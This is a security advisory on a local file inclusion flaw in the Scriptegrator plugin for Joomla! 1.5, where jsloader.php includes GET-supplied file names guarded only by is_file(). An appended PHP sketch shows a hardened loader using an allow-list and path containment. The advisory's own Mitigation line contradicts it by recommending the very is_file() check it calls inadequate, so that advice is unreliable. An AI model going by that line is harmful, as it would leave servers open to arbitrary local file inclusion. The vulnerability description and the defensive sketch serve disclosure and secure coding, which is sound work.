Vendor: Scriptegrator plugin for Joomla! 1.5
By: S2 Crew [Hungary]
CVSS: 7.5 (HIGH)
Type: File Inclusion
CWE: 98
Product Name: Scriptegrator plugin for Joomla! 1.5
Affected Version From: Joomla! 1.5
Affected Version To: Joomla! 1.5
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Debian Linux, Apache, Joomla! 1.5
Core Design Scriptegrator plugin for Joomla! 1.5 file inclusion
A file called jsloader.php takes an array of file names from the HTTP GET parameters and calls include() on each of them. The only protection is an is_file() check, which rules out remote file inclusion but nothing else, so it is trivial to exploit this vulnerability to make the PHP interpreter process any file on the target system that the httpd user can read.
Mitigation:
Ensure that the is_file() call is used to check for the existence of the file before including it.
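A sketch of a loader that restricts what may be included, for the jsloader.php pattern described above, where is_file() only confirms that a path exists. This is an added example, not the plugin's code; the parameter name `files`, the directory and the allow-list entries are assumptions.

```php
<?php
// Added example (requires PHP 7.1+). Not the plugin's code: the parameter
// name "files", SCRIPT_DIR and the ALLOWED entries are hypothetical.

// Pattern described in the advisory (existence check only):
//   foreach ($_GET['files'] as $f) { if (is_file($f)) { include($f); } }

const SCRIPT_DIR = __DIR__ . '/libraries';               // assumed asset directory
const ALLOWED    = ['example-a.js.php', 'example-b.js.php']; // constructed names

/**
 * Map a requested name to a path that is safe to include, or null.
 */
function resolve_script(string $name, string $baseDir = SCRIPT_DIR, array $allowed = ALLOWED): ?string
{
    // 1. Exact, type-strict allow-list match: no separators, no "..",
    //    no absolute paths can get past this point.
    if (!in_array($name, $allowed, true)) {
        return null;
    }
    // 2. Canonicalise both paths; realpath() resolves symlinks and
    //    returns false when the target does not exist.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null;
    }
    // 3. Containment: the resolved file must still live under the base
    //    directory (guards against a symlink pointing elsewhere).
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

$requested = $_GET['files'] ?? [];
if (!is_array($requested)) {
    $requested = [$requested];
}
foreach ($requested as $name) {
    $path = is_string($name) ? resolve_script($name) : null;
    if ($path === null) {
        http_response_code(400); // reject the whole request on any bad entry
        exit;
    }
    include $path;
}
```

If the loaded files are plain scripts rather than PHP, sending them with readfile() instead of include keeps them away from the interpreter entirely.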